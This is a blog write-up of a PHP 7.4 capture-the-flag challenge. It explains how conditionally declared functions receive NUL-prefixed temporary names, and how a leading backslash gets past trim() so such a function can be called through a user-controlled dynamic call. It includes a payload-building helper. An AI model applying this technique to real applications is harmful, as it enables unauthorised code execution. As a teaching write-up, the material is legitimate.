Knowledge Planet October 2023 PHP Function Challenge

This article was published on my blog on October 13th.

A few days ago, I posted a small challenge on the “Code Audit” Knowledge Planet: https://t.zsxq.com/13bFX1N8F

<?php
$password = trim($_REQUEST['password'] ?? '');
$name = trim($_REQUEST['name'] ?? 'viewsource');
function viewsource() {show_source(__FILE__);}

if (strcmp(hash('sha256', $password), 'ca572756809c324632167240d208681a03b4bd483036581a6190789165e1387a') === 0) {
    function readflag() {
        echo 'flag';
    }
}

$name();
?>

The execution environment is PHP7.4, and the goal is to read the flag.

This code is very simple. I added some distractions, such as the trim, strcmp, and hash functions, but they are not the core of the challenge. Let's do a simple analysis.

Understanding the PHP script execution process

I am not an expert in C or in PHP internals, so I can only describe the compilation and execution of a PHP script in simple terms.

Like most other scripting languages, PHP execution is divided into two parts:

  • Compiling the source code into Zend virtual machine instructions (called oplines in PHP)

  • The Zend virtual machine executing those instructions

The former will be divided into the following steps:

  • Call zendparse to complete lexical analysis, syntax analysis, and generate AST tree

  • Call init_op_array, zend_compile_top_stmt to complete the conversion of AST to opline array

  • Call pass_two to complete the conversion of compile-time to runtime information, and set the handler corresponding to each opcode.

The latter takes the compiled opline array and executes each opcode in sequence; in practice, it runs the handler that corresponds to each opcode, which completes the execution of the PHP script. Using the remote debugging method for the Zend VM that I shared on the “Code Audit” planet, we can find the zend_execute_scripts function and see the general logic:

[Screenshot: the zend_execute_scripts function in the debugger]

What we want to focus on is the compilation phase. When PHP compiles a function definition, it uses the zend_compile_func_decl function:

void zend_compile_func_decl(znode *result, zend_ast *ast, zend_bool toplevel) /* {{{ */
{
    ...
    zend_ast_decl *decl = (zend_ast_decl *) ast;
    zend_bool is_method = decl->kind == ZEND_AST_METHOD;
    if (is_method) {
        zend_bool has_body = stmt_ast != NULL;
        zend_begin_method_decl(op_array, decl->name, has_body);
    } else {
        zend_begin_func_decl(result, op_array, decl, toplevel);
        if (decl->kind == ZEND_AST_ARROW_FUNC) {
            find_implicit_binds(&info, params_ast, stmt_ast);
            compile_implicit_lexical_binds(&info, result, op_array);
        } else if (uses_ast) {
            zend_compile_closure_binding(result, op_array, uses_ast);
        }
    }
}

As you can see, class methods and ordinary functions are handled by the same function. It has a key parameter called toplevel which, as the name suggests, indicates whether the current function definition is in the top-level scope. Let's follow zend_begin_func_decl, which handles ordinary functions:

static void zend_begin_func_decl(znode *result, zend_op_array *op_array, zend_ast_decl *decl, zend_bool toplevel) /* {{{ */
{
    ...
    zend_register_seen_symbol(lcname, ZEND_SYMBOL_FUNCTION);
    if (toplevel) {
        if (UNEXPECTED(zend_hash_add_ptr(CG(function_table), lcname, op_array) == NULL)) {
            do_bind_function_error(lcname, op_array, 1);
        }
        zend_string_release_ex(lcname, 0);
        return;
    }

    /* Generate RTD keys until we find one that isn't in use yet. */
    key = NULL;
    do {
        zend_tmp_string_release(key);
        key = zend_build_runtime_definition_key(lcname, decl->start_lineno);
    } while (!zend_hash_add_ptr(CG(function_table), key, op_array));

    ...
}

When toplevel is true, execution enters the first if statement, which adds the current function name lcname directly to the function table. When toplevel is false, execution enters the do while loop below, which uses zend_build_runtime_definition_key to generate a key and adds that key to the function table as the function name.

In other words, depending on where the function is located (whether it is a top-level scope), the function name generated when PHP is compiled will be different.
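The visible effect of this split can be observed from plain PHP without a debugger. The following is a minimal sketch (the variable names are mine, not from the challenge): a top-level function already exists before the line that declares it is reached, while a conditionally declared function only becomes callable under its real name once the enclosing block has run.

```php
<?php
// Top-level function: bound into the function table at compile time,
// so it already exists before the declaration below is reached.
$topLevelBefore = function_exists('func1');

function func1() {
    return 'func1';
}

// Conditional function: not yet available under its real name,
// because the enclosing block has not been executed.
$conditionalBefore = function_exists('func2');

if (true) {
    function func2() {
        return 'func2';
    }
}

// After the block has run, the real name is in the function table.
$conditionalAfter = function_exists('func2');

var_dump($topLevelBefore, $conditionalBefore, $conditionalAfter);
// bool(true)
// bool(false)
// bool(true)
```

This only shows the userland consequence; it says nothing about the temporary key itself, which is what the debugging session examines.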

We can try to execute the following code under PHP7.4:

<?php
function func1() {
    echo 'func1';
}

if (true) {
    function func2() {
        echo 'func2';
    }
}

When compiling the first function, it will enter the if (toplevel) condition. At this time, lcname is func1:

[Screenshot: debugger inside the if (toplevel) branch, with lcname equal to func1]

When lcname is func2, execution enters the do while loop, where zend_build_runtime_definition_key generates a key that is used as the name of this function:

[Screenshot: debugger inside the do while loop, with lcname equal to func2]

Let’s press F11 to enter the function and see what the logic is:

[Screenshot: the body of zend_build_runtime_definition_key in the debugger]

It can be seen that the core of this function is a string formatting, and the final key is generated according to the following algorithm:

'\0' + name + filename + ':' + start_lineno + '$' + rtd_key_counter

Apart from the leading \0 character, the four parts have the following meanings:

  • name: the function name

  • filename: the absolute path of the PHP file

  • start_lineno: the line number where the function definition starts (1 is the first line)

  • rtd_key_counter: a global counter that starts at 0 and increases by 1 each time a key is generated

So, in my debugging screenshot above, the current value of result->val is \0func2/root/source/php-src/tests/web/ctf3.php:7$0.

In other words, the function name finally saved in the function table is the above string starting with \0.
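The key format is easy to reproduce in userland. Below is a minimal sketch, not the engine's code: build_rtd_key is a hypothetical helper of mine, and rendering the counter in hexadecimal is an assumption based on my reading of the 7.4 source (for counters below 10 the result is identical to decimal).

```php
<?php
// Hypothetical helper that mirrors the key layout described above:
// "\0" + lowercased name + absolute file path + ":" + start line + "$" + counter
function build_rtd_key(string $name, string $filename, int $startLine, int $counter): string
{
    // Assumption: the counter is formatted as hex, as in the 7.4 source.
    return "\0" . strtolower($name) . $filename . ':' . $startLine . '$' . dechex($counter);
}

$key = build_rtd_key('func2', '/root/source/php-src/tests/web/ctf3.php', 7, 0);

// Make the NUL byte visible when printing.
echo str_replace("\0", '\0', $key), PHP_EOL;
// \0func2/root/source/php-src/tests/web/ctf3.php:7$0
```

With the values from the debugging session, the sketch reproduces the string seen in result->val.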

Opline differences caused by the scope of the function

In the previous section, we used debugging to briefly analyze the compilation logic for a function located in a non-top-level scope. While analyzing zend_begin_func_decl above, I also noticed that when toplevel is false, PHP calls get_next_op() to generate a new opline, but it does not do so when toplevel is true.

Let’s take a look at the differences between the two in opline.

Using the vld extension, we can view oplines of PHP code. Let’s first take a look at the oplines of the following code:

<?php
function func1() {
    echo 'func1';
}
func1();

[Screenshot: vld output for the code above]

It can be seen that there is no opcode for function definition here. The two opcodes starting from line 5 are INIT_FCALL and DO_FCALL, which are used to execute functions.

Take a look at the opline of the following code:

<?php
if (true) {
    function func2() {
        echo 'func2';
    }
}
func2();

[Screenshot: vld output for the code above]

Two differences are obvious:

  • There is an additional opcode, DECLARE_FUNCTION, which defines the function

  • The INIT_FCALL used to call the function becomes INIT_FCALL_BY_NAME

When PHP compiles a function in a non-top-level scope, the original function name and the generated key are stored, in that order, in the attributes of the DECLARE_FUNCTION opline. Only when the DECLARE_FUNCTION opcode is executed is the real, original function name put into the function table.

In other words, if a function is not in the top-level scope, a function name starting with \0 is first placed in the function table during the compilation phase, and then the DECLARE_FUNCTION handler puts the real function name into the function table during the execution phase.

So, back to the challenge at the beginning of this article: because we cannot satisfy the strcmp comparison in the if statement, execution never enters the if block and DECLARE_FUNCTION never runs. When $name() is executed later, the function cannot be called by its original name, readflag; it has to be called by the name starting with \0.

Bypass trim filtering

Following the above idea, I calculated the key according to the algorithm of zend_build_runtime_definition_key and sent it as the function name:

[Screenshot: request sending the computed key as name, and the resulting error]

A “Call to undefined function” error still occurs. Why?

In fact, I left another trap: trim. The trim function removes whitespace characters from the beginning and end of the string it receives. The whitespace characters here are the following six: space, \n, \r, \t, \v, and \0. I introduced this in my article “Writeups of Several ‘Three White Hats’ Competitions in 2016”.

In other words, the first \0 character of the name passed in by the user is filtered out by trim, resulting in the function being unable to be called normally.
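The effect is easy to confirm in isolation. In this small sketch the key is a made-up example (the path and line number are placeholders, not the real target's values):

```php
<?php
// Hypothetical key; the file path and line number are placeholders.
$key = "\0readflag/var/www/html/index.php:7\$0";

$trimmed = trim($key);

// trim() strips the leading NUL byte, so the result no longer matches the key.
var_dump(strlen($key) - strlen($trimmed)); // int(1)
var_dump($trimmed === $key);               // bool(false)
var_dump($trimmed[0]);                     // string(1) "r"
```

Only the leading NUL byte is lost; the trailing "0" is an ordinary digit and is left alone.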

Let’s see how to solve it. First, the opcode used for dynamic function calls is INIT_DYNAMIC_CALL, which we can see using vld. Then find the corresponding handler in the PHP source code:

static ZEND_OPCODE_HANDLER_RET ZEND_FASTCALL ZEND_INIT_DYNAMIC_CALL_SPEC_CONST_HANDLER(ZEND_OPCODE_HANDLER_ARGS)
{
    USE_OPLINE

    zval *function_name;
    zend_execute_data *call;

    SAVE_OPLINE();
    function_name = RT_CONSTANT(opline, opline->op2);

try_function_name:
    if (IS_CONST != IS_CONST && EXPECTED(Z_TYPE_P(function_name) == IS_STRING)) {
        call = zend_init_dynamic_call_string(Z_STR_P(function_name), opline->extended_value);
    } else if (IS_CONST != IS_CONST && EXPECTED(Z_TYPE_P(function_name) == IS_OBJECT)) {
        call = zend_init_dynamic_call_object(function_name, opline->extended_value);
    } else if (EXPECTED(Z_TYPE_P(function_name) == IS_ARRAY)) {
        call = zend_init_dynamic_call_array(Z_ARRVAL_P(function_name), opline->extended_value);
    }
    ...
}

When the function name is a string, zend_init_dynamic_call_string will be executed:

static zend_never_inline zend_execute_data *zend_init_dynamic_call_string(zend_string *function, uint32_t num_args) /* {{{ */
{
    if ((colon = zend_memrchr(ZSTR_VAL(function), ':', ZSTR_LEN(function))) != NULL &&
        colon > ZSTR_VAL(function) &&
        *(colon-1) == ':'
    ) {
        ...
    } else {
        /* A leading backslash (root namespace) is skipped before the lookup. */
        if (ZSTR_VAL(function)[0] == '\\') {
            lcname = zend_string_alloc(ZSTR_LEN(function) - 1, 0);
            zend_str_tolower_copy(ZSTR_VAL(lcname), ZSTR_VAL(function) + 1, ZSTR_LEN(function) - 1);
        } else {
            lcname = zend_string_tolower(function);
        }
        if (UNEXPECTED((func = zend_hash_find(EG(function_table), lcname)) == NULL)) {
            zend_throw_error(NULL, "Call to undefined function %s()", ZSTR_VAL(function));
            zend_string_release_ex(lcname, 0);
            return NULL;
        }
        ...
    }
    ...
}

The else branch checks the first character of the function name. If it is a backslash \, the backslash is removed before the name is looked up in the function table.

This logic is easy to understand in terms of PHP code: it strips the backslash of the root namespace. All PHP internal functions, and all functions without a specified namespace, can be called with \ as the namespace, such as \phpinfo(). The first question of the Code Breaking 2018 challenge hosted by the “Code Audit” Knowledge Planet took advantage of this feature. Readers who have forgotten it can review it: https://t.zsxq.com/BIuNniY, https://paper.seebug.org/755/.
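As a rough userland model of that else branch, the lookup name can be derived as follows. normalize_dynamic_name is a hypothetical helper written only for illustration; the second half of the sketch shows the engine applying the same rule to a real dynamic call.

```php
<?php
// Hypothetical helper modelling the else branch: drop one leading
// backslash, then lowercase the rest to get the function-table key.
function normalize_dynamic_name(string $function): string
{
    if ($function !== '' && $function[0] === '\\') {
        return strtolower(substr($function, 1));
    }
    return strtolower($function);
}

var_dump(normalize_dynamic_name('\PHPInfo')); // string(7) "phpinfo"

// The engine itself accepts a leading backslash in a dynamic call:
$f = '\strlen';
var_dump($f('abc')); // int(3)
```

Note that only a single leading backslash is removed; everything after it, including a NUL byte, is kept as part of the lookup name.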

Therefore, we add a \ to the front of name and send the request again, and this time we get the flag:

[Screenshot: request with the leading backslash added, returning the flag]

Note, however, that because the file had already been requested once, the trailing rtd_key_counter in the name here has become 1; the value increases by 1 every time this file is accessed.
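Since the counter is not known in advance, one practical approach is to prepare a handful of candidate values for name and try them in turn. The sketch below is only an illustration: candidate_payloads is a hypothetical helper, and the file path, line number, and counter range are placeholders rather than the real target's values.

```php
<?php
// Hypothetical helper: builds URL-encoded candidates for the name parameter,
// one per counter value. All arguments used below are placeholders.
function candidate_payloads(string $name, string $file, int $line, int $maxCounter): array
{
    $payloads = [];
    for ($counter = 0; $counter <= $maxCounter; $counter++) {
        // Assumption: the counter is formatted as hex in the key.
        $key = "\0" . strtolower($name) . $file . ':' . $line . '$' . dechex($counter);
        // The leading backslash survives trim() and is dropped again
        // by the engine before the function-table lookup.
        $payloads[] = rawurlencode('\\' . $key);
    }
    return $payloads;
}

foreach (candidate_payloads('readflag', '/var/www/html/index.php', 7, 2) as $payload) {
    echo $payload, PHP_EOL;
}
// First line printed: %5C%00readflag%2Fvar%2Fwww%2Fhtml%2Findex.php%3A7%240
```

Each printed value can be sent as the name parameter; the one whose counter matches the server's current state is the one that resolves to the function.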

Changes in PHP 8.1

I limited the execution environment of this challenge to PHP 7.4. The reason is that in PHP 8.1 and later, the use of temporary function names during compilation has been removed.

The PR involved in this change is https://github.com/php/php-src/pull/5595. The reason PHP removed this feature has nothing to do with the trick in this article; rather, the memory occupied by these temporary functions was not released in some cases, causing memory leaks.

The PHP developers directly removed the logic that generates temporary function names from zend_begin_func_decl:

[Screenshot: diff removing the temporary function name logic from zend_begin_func_decl]

However, the zend_build_runtime_definition_key function itself has not been removed. It is still called to generate a temporary class name when a class is defined outside the top-level scope. That is a separate topic that this article will not expand on, but with some tinkering you could come up with a similar CTF question.
